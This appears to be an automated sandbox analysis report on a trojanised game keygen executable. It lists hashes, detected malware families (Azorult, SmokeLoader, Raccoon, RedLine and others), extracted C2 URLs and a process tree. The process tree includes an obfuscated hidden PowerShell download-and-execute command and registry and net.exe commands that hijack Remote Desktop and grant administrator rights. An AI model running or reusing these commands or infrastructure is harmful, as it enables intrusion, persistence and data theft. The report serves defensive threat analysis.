Analysis
-
max time kernel
156s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28/02/2021, 20:35
General
-
Target
[CRACKNET.NET]PW12345City.Car.Driving.Verss.1.5.0.key.code.generator.exe
-
Size
9.2MB
-
MD5
ad902aa32e3899e0800521f9a32f988c
-
SHA1
4f1a7ac4ce37f8fcf31802f73193d3e9a706115a
-
SHA256
cbdca73f35a74084333ad849b15742bed455e5bfd4ce24edb202e71586c4d77f
-
SHA512
631c091108d386b35d50464846fbeae2eff44480d3903866d15ac1ac61ae27eecf2361ac60a7539ca034daec8a63e161ffd66488fdae653546baf0407e11ca43
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 6 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies boot configuration data using bcdedit 15 IoCs
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Nirsoft 18 IoCs
-
XMRig Miner Payload 6 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 38 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks for any installed AV software in registry 1 TTPs 53 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Program crash 16 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 10 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 17 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
GoLang User-Agent 11 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 7 IoCs
-
Script User-Agent 19 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SetWindowsHookEx 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACKNET.NET]PW12345City.Car.Driving.Verss.1.5.0.key.code.generator.exe"C:\Users\Admin\AppData\Local\Temp\[CRACKNET.NET]PW12345City.Car.Driving.Verss.1.5.0.key.code.generator.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"C:\Users\Admin\AppData\Roaming\80AF.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exeC:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1614547944149.exe"C:\Users\Admin\AppData\Roaming\1614547944149.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614547944149.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\1614547949133.exe"C:\Users\Admin\AppData\Roaming\1614547949133.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614547949133.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1614547955277.exe"C:\Users\Admin\AppData\Roaming\1614547955277.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614547955277.txt"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-NQHMF.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQHMF.tmp\23E04C4F32EF2158.tmp" /SL5="$500C8,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exeC:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe" 1 3.1614544564.603bfeb46787c 1016⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LUAP1RAIVJ\multitimer.exe" 2 3.1614544564.603bfeb46787c7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\l01jo5a1e51\safebits.exe"C:\Users\Admin\AppData\Local\Temp\l01jo5a1e51\safebits.exe" /S /pubid=1 /subid=4518⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 6969⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\g2jts2bpo2w\f3sbqklwwdx.exe"C:\Users\Admin\AppData\Local\Temp\g2jts2bpo2w\f3sbqklwwdx.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2H102.tmp\f3sbqklwwdx.tmp"C:\Users\Admin\AppData\Local\Temp\is-2H102.tmp\f3sbqklwwdx.tmp" /SL5="$90068,870426,780800,C:\Users\Admin\AppData\Local\Temp\g2jts2bpo2w\f3sbqklwwdx.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KSJ7O.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-KSJ7O.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\P6WyeuVim.exe"C:\Users\Admin\AppData\Local\Temp\P6WyeuVim.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\P6WyeuVim.exe"C:\Users\Admin\AppData\Local\Temp\P6WyeuVim.exe"12⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1614548026961.exe"C:\Users\Admin\AppData\Local\Temp\1614548026961.exe"13⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'15⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4pyw0nqb\4pyw0nqb.cmdline"16⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AB3.tmp" "c:\Users\Admin\AppData\Local\Temp\4pyw0nqb\CSC5CBDBD1BD1BA4FE8BD55DFE76E46D8.TMP"17⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jxvmj21k\jxvmj21k.cmdline"16⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D3F.tmp" "c:\Users\Admin\AppData\Local\Temp\jxvmj21k\CSC1F1A96DA301944ED9228DB4D6AD8564.TMP"17⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f16⤵
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f16⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f16⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add16⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add17⤵
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr16⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr17⤵
-
C:\Windows\system32\net.exenet start rdpdr18⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr19⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService16⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService17⤵
-
C:\Windows\system32\net.exenet start TermService18⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService19⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f16⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f16⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ugydpryij42\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\ugydpryij42\setup_10.2_us3.exe" /silent8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-HGCPE.tmp\setup_10.2_us3.tmp"C:\Users\Admin\AppData\Local\Temp\is-HGCPE.tmp\setup_10.2_us3.tmp" /SL5="$3014E,746887,121344,C:\Users\Admin\AppData\Local\Temp\ugydpryij42\setup_10.2_us3.exe" /silent9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s110⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1Gusg7"10⤵
- Checks computer location settings
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ougcxdkvmrq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ougcxdkvmrq\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-R09JS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-R09JS.tmp\Setup3310.tmp" /SL5="$10252,802346,56832,C:\Users\Admin\AppData\Local\Temp\ougcxdkvmrq\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-J0BQ3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J0BQ3.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-QJ3PS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QJ3PS.tmp\Setup.tmp" /SL5="$402C0,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-J0BQ3.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\ProPlugin.exe" /Verysilent12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-OV64R.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-OV64R.tmp\ProPlugin.tmp" /SL5="$203E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VRSRA.tmp\ProPlugin.exe" /Verysilent13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-T1KTT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-T1KTT.tmp\Setup.exe"14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"15⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\regedit.exeregedit /s chrome.reg16⤵
- Runs .reg file with regedit
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe16⤵
- Kills process with taskkill
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat16⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)17⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"19⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ffc2cb16e00,0x7ffc2cb16e10,0x7ffc2cb16e2020⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,9222379261103835405,2936461221901809414,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1684 /prefetch:820⤵
-
-
